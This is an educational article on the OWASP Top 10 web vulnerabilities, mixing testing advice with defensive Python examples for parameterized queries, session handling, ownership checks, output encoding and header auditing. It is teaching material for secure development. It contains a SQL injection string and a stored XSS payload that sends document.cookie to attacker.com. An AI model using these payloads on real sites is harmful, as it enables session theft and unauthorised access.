The OWASP Top 10 is updated every few years and reflects what’s consistently showing up in real-world assessments and breaches. The headlines cycle through novel attack techniques, but the vulnerabilities that actually compromise organizations are disproportionately the same classes of problems they were twenty years ago. Understanding these is the foundation for both building more secure applications and testing them.
Injection
SQL injection, command injection, LDAP injection — the common thread is that user-supplied input is interpreted as code by a backend system. Classic SQL injection:
-- Vulnerable query
"SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
-- Malicious input
username: ' OR '1'='1
-- Resulting query. Note that AND binds tighter than OR, so with this input in the
-- username field alone the password predicate still applies; the classic bypass
-- supplies the same input in the password field as well, which makes the WHERE
-- clause true for every row and authenticates anyone
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'anything'
The defense is parameterized queries everywhere, without exception. No string concatenation for SQL. No passing user input to shell commands. Parameterized queries prevent the input from being interpreted as SQL because the statement text and the parameter values are sent to the database separately: the values are bound as data and are never parsed as part of the query.
SQLMap automates SQL injection discovery and exploitation and is the standard tool for assessing injection surface in authorized testing.
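The concatenated query from the example above next to its parameterized form, as an added illustration that is not part of the original article. It uses Python's sqlite3 module with an in-memory database and constructed sample rows; the plaintext password column is kept only to mirror the shape of the page's query.

```python
import sqlite3

# Constructed sample rows for this demonstration. Plaintext passwords are kept
# only to mirror the page's query; real systems store salted hashes.
SAMPLE_USERS = [("alice", "correct-horse"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The page's concatenated query: user input becomes part of the SQL text,
    so quote characters in the input change the structure of the statement."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return [row[0] for row in conn.execute(query)]


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Placeholders: the statement text is fixed and the values are bound
    separately, so they are compared as data and never parsed as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"
    print("parameterized, probe in both fields:", login_parameterized(db, probe, probe))
    print("concatenated, probe in username only:", login_vulnerable(db, probe, "anything"))
    print("concatenated, probe in both fields:", login_vulnerable(db, probe, probe))
```

Running it shows the precedence point from the comment above: with the probe in the username field only, the concatenated query still returns nothing because the password predicate applies; with the same probe in both fields it returns every user. The parameterized version returns nothing in either case, because the quote characters are just bytes in a bound value.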
Broken Authentication
Authentication failures range from weak session tokens that can be guessed to improper credential handling (logging passwords, storing them without salting) to missing brute-force protection. Common findings:
- Tokens with insufficient entropy that can be predicted or brute-forced
- Sessions that don’t expire
- Credentials transmitted over unencrypted connections
- Password reset flows with exploitable logic flaws
- No rate limiting on authentication endpoints
Testing focuses on session token analysis, authentication bypass attempts, and reviewing how credentials are handled in transit and at rest.
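The findings listed above map onto a handful of server-side controls: tokens drawn from a cryptographic random source, sessions that expire when idle, salted password hashing, and per-account throttling of failed logins. The following is an added example of those controls in Python, not code from the original article; the timeout, window and attempt-count values are assumed policy numbers, and the clock is injectable so the expiry behaviour can be exercised without waiting.

```python
import hashlib
import hmac
import secrets
import time
from typing import Optional, Tuple

TOKEN_BYTES = 32          # 256 bits from the OS CSPRNG
SESSION_TTL = 15 * 60     # idle timeout in seconds; assumed policy value
MAX_FAILURES = 5          # failed attempts per window before throttling; assumed
FAILURE_WINDOW = 10 * 60  # seconds; assumed


def weak_token(user_id: int, now: float) -> str:
    """Anti-pattern: built from values an attacker can know or guess."""
    return f"{user_id}-{int(now)}"


def strong_token() -> str:
    """Unguessable: drawn from the OS cryptographic random source."""
    return secrets.token_urlsafe(TOKEN_BYTES)


class SessionStore:
    """Server-side sessions keyed by an unguessable token, with an idle timeout."""

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable for testing
        self._sessions = {}          # token -> (user_id, last_seen)

    def create(self, user_id: int) -> str:
        token = strong_token()
        self._sessions[token] = (user_id, self._clock())
        return token

    def lookup(self, presented: str) -> Optional[int]:
        """Return the user id for a live session, or None if unknown or expired."""
        entry = self._sessions.get(presented)
        if entry is None:
            return None
        user_id, last_seen = entry
        now = self._clock()
        if now - last_seen > SESSION_TTL:
            del self._sessions[presented]   # idle sessions are dropped, not kept forever
            return None
        self._sessions[presented] = (user_id, now)
        return user_id

    def revoke(self, token: str) -> None:
        self._sessions.pop(token, None)


class LoginThrottle:
    """Sliding-window limit on failed authentication attempts per account."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._failures = {}          # username -> list of failure timestamps

    def allowed(self, username: str) -> bool:
        now = self._clock()
        recent = [t for t in self._failures.get(username, []) if now - t < FAILURE_WINDOW]
        self._failures[username] = recent
        return len(recent) < MAX_FAILURES

    def record_failure(self, username: str) -> None:
        self._failures.setdefault(username, []).append(self._clock())


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted, memory-hard hash; a fresh random salt per user defeats precomputed tables."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute and compare in constant time so timing does not leak a match prefix."""
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)
```

When testing an application, the behaviours to look for are the inverse of these: a token whose value resembles weak_token's output, a session that still resolves after a long idle period, a login endpoint that keeps answering at full speed after many failures, or a database column that holds unsalted digests.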
Sensitive Data Exposure
Applications frequently expose data they shouldn’t. This includes: unencrypted databases and backups, debug endpoints left accessible in production, verbose error messages that reveal stack traces and internal paths, and API responses that return fields the client doesn’t need but an attacker finds useful.
Error message exposure is particularly useful for reconnaissance — it reveals technology stacks, internal file paths, and often details about the application’s data model.
Insecure Direct Object References (IDOR)
One of the most common and highest-impact findings in bug bounty programs. The application uses a user-controlled identifier to access a resource without verifying that the requesting user should have access to that specific resource.
# Request
GET /api/invoices/47382
# What happens: invoice 47382 is returned
# What should happen: verify that the authenticated user owns invoice 47382
# What often happens: no check
Testing: identify any place where the application uses an ID, account number, or reference to retrieve a specific object. Modify the value and see if you can access data belonging to another user. Horizontal privilege escalation via IDOR is trivially easy to find and exploit and surprisingly common even in mature applications.
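The invoice lookup from the request above, as an added example (not code from the original article) of what "no check" looks like next to a lookup that carries the ownership condition inside the query itself. It uses an in-memory sqlite3 table with constructed rows; the invoice number 47382 is reused from the page's request and the owner ids and descriptions are made up.

```python
import sqlite3
from typing import Optional, Tuple

# Constructed sample data: (invoice_id, owner_id, description).
# 47382 is the invoice number from the page's example request.
SAMPLE_INVOICES = [
    (47382, 1, "Q3 consulting"),
    (47383, 2, "Hosting renewal"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE invoices (id INTEGER PRIMARY KEY, owner_id INTEGER NOT NULL, description TEXT)"
    )
    conn.executemany("INSERT INTO invoices VALUES (?, ?, ?)", SAMPLE_INVOICES)
    return conn


def get_invoice_vulnerable(conn: sqlite3.Connection, invoice_id: int):
    """The IDOR: the object is fetched by the client-supplied id and nothing else."""
    return conn.execute(
        "SELECT id, owner_id, description FROM invoices WHERE id = ?", (invoice_id,)
    ).fetchone()


def get_invoice(conn: sqlite3.Connection, current_user_id: int, invoice_id: int):
    """Ownership is part of the predicate, so it cannot be forgotten by a caller,
    and another user's invoice is indistinguishable from one that does not exist."""
    return conn.execute(
        "SELECT id, owner_id, description FROM invoices WHERE id = ? AND owner_id = ?",
        (invoice_id, current_user_id),
    ).fetchone()


def handle_request(conn: sqlite3.Connection, current_user_id: int, invoice_id: int) -> Tuple[int, Optional[dict]]:
    """Maps the lookup to an HTTP-style status. 404 covers both 'missing' and
    'not yours', so the response does not confirm that the id exists."""
    row = get_invoice(conn, current_user_id, invoice_id)
    if row is None:
        return 404, None
    return 200, {"id": row[0], "description": row[2]}


if __name__ == "__main__":
    db = make_db()
    print("user 1, own invoice:", handle_request(db, 1, 47382))
    print("user 2, someone else's invoice:", handle_request(db, 2, 47382))
    print("unchecked lookup:", get_invoice_vulnerable(db, 47382))
```

The test described in the paragraph above is the same operation handle_request performs: take a request that works for one user, keep the id, change the identity, and see whether the data still comes back.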
Cross-Site Scripting (XSS)
User input reflected back to the browser without proper encoding gets executed as JavaScript. Stored XSS (persisted in the database and rendered to other users) is higher impact than reflected (requires the victim to click a crafted link).
// Stored XSS in a comment field
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
Testing for XSS: inject payloads wherever user input is reflected. A simple probe such as "> identifies injection points without requiring a complex payload. Burp Suite’s scanner automates basic XSS discovery.
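Output encoding is the fix for the reflection problem described above. The following added example (not code from the original article) renders the page's stored payload and the "> probe through an unencoded template and through one that encodes for the HTML context, then parses the result with Python's standard HTML parser to show the structural difference rather than just the text difference.

```python
import html
from html.parser import HTMLParser
from typing import List, Optional

# The stored payload from the page's comment-field example, used here as input.
STORED_PAYLOAD = (
    "<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"
)
# The minimal probe the page mentions: closes an attribute value and the tag.
ATTRIBUTE_PROBE = '">'


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates the stored value straight into HTML text."""
    return f'<p class="comment">{comment}</p>'


def render_comment(comment: str) -> str:
    """HTML text context: <, >, &, and quotes become entities, so the browser
    displays the payload as text instead of executing it."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_search_box_vulnerable(value: str) -> str:
    return f'<input type="text" name="q" value="{value}">'


def render_search_box(value: str) -> str:
    """Attribute context: the value is quoted AND quotes are escaped, so the
    attribute closes where the template closes it, not where the input says."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


class _Collector(HTMLParser):
    """Records the start tags seen and the value attribute of any <input>."""

    def __init__(self):
        super().__init__()
        self.tags: List[str] = []
        self.input_values: List[Optional[str]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.append(dict(attrs).get("value"))


def tags_in(rendered: str) -> List[str]:
    """Start tags present in the rendered markup; extra tags came from the input."""
    p = _Collector()
    p.feed(rendered)
    return p.tags


def parsed_value_attr(rendered: str) -> Optional[str]:
    """The value attribute as a browser would parse it (entities decoded)."""
    p = _Collector()
    p.feed(rendered)
    return p.input_values[0] if p.input_values else None


if __name__ == "__main__":
    print(tags_in(render_comment_vulnerable(STORED_PAYLOAD)))   # script tag is live
    print(tags_in(render_comment(STORED_PAYLOAD)))              # only the template's <p>
    print(repr(parsed_value_attr(render_search_box_vulnerable(ATTRIBUTE_PROBE))))
    print(repr(parsed_value_attr(render_search_box(ATTRIBUTE_PROBE))))
```

The parsed-value check is the same thing a tester does by eye in the proxy: if the value that comes back out of the parsed attribute is not the value that went in, the input broke out of its context, and the application is encoding for the wrong context or not at all.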
Security Misconfiguration
The broadest category. Includes: default credentials left in place, unnecessary services exposed, overly permissive CORS headers, verbose server headers leaking software versions, S3 buckets left public, debug mode left on in production.
Assessment: nmap -sV for version exposure; check HTTP headers (Server, X-Powered-By) for software disclosure; test common default credentials; enumerate cloud storage with tools like aws s3 ls for misconfigured buckets.
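Two of the header checks from the assessment list above, software disclosure through Server and X-Powered-By and overly permissive CORS, as an added example (not code from the original article) that runs over constructed response headers. The header values, origins and finding codes are made up for the demonstration; in practice the input would be the response captured in the proxy.

```python
import re
from typing import Dict, List, Optional

# Constructed responses illustrating the misconfigurations the page lists.
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "X-Powered-By": "PHP/7.4.3",
    "Access-Control-Allow-Origin": "*",
}
# A server that echoes whatever Origin it was sent, with credentials enabled.
REFLECTING_HEADERS = {
    "Server": "nginx",
    "Access-Control-Allow-Origin": "https://untrusted.example",
    "Access-Control-Allow-Credentials": "true",
}
# What a hardened response looks like: no version, fixed allow-list origin.
HARDENED_HEADERS = {
    "Server": "nginx",
    "Access-Control-Allow-Origin": "https://app.example",
}

_VERSION_RE = re.compile(r"\d+\.\d+")   # any dotted version number


def audit_headers(headers: Dict[str, str], request_origin: Optional[str] = None) -> List[str]:
    """Return finding codes for disclosure and CORS problems in one response.

    request_origin is the Origin header the request carried, if any; it is
    needed to recognise a server that reflects arbitrary origins.
    """
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    server = h.get("server", "")
    if _VERSION_RE.search(server):
        findings.append("server-version")          # e.g. Apache/2.4.41
    if "x-powered-by" in h:
        findings.append("x-powered-by")            # framework/runtime disclosure

    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao == "*":
        findings.append("cors-wildcard")           # any site may read responses
    elif request_origin and acao == request_origin and creds:
        # Reflecting the caller's origin with credentials lets any site make
        # authenticated cross-origin reads; this is the dangerous CORS form.
        findings.append("cors-reflected-origin-with-credentials")
    return findings


if __name__ == "__main__":
    print(audit_headers(SAMPLE_HEADERS))
    print(audit_headers(REFLECTING_HEADERS, request_origin="https://untrusted.example"))
    print(audit_headers(HARDENED_HEADERS, request_origin="https://untrusted.example"))
```

The reflected-origin case needs a second request with a different Origin to distinguish a genuine allow-list entry from reflection, which is why the function takes the request origin as an argument rather than guessing from the response alone.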
The Testing Workflow
A structured web application assessment works through each OWASP category systematically using a combination of automated scanning (Burp Suite Pro scanner or OWASP ZAP) and manual testing focused on the highest-impact findings. Automated tools catch the obvious; manual testing finds the logic flaws and IDORs that scanners miss.
The proxy (Burp Suite is the standard) sits between the browser and the application, recording every request and response. This gives you a complete view of the attack surface and the ability to replay and modify any request.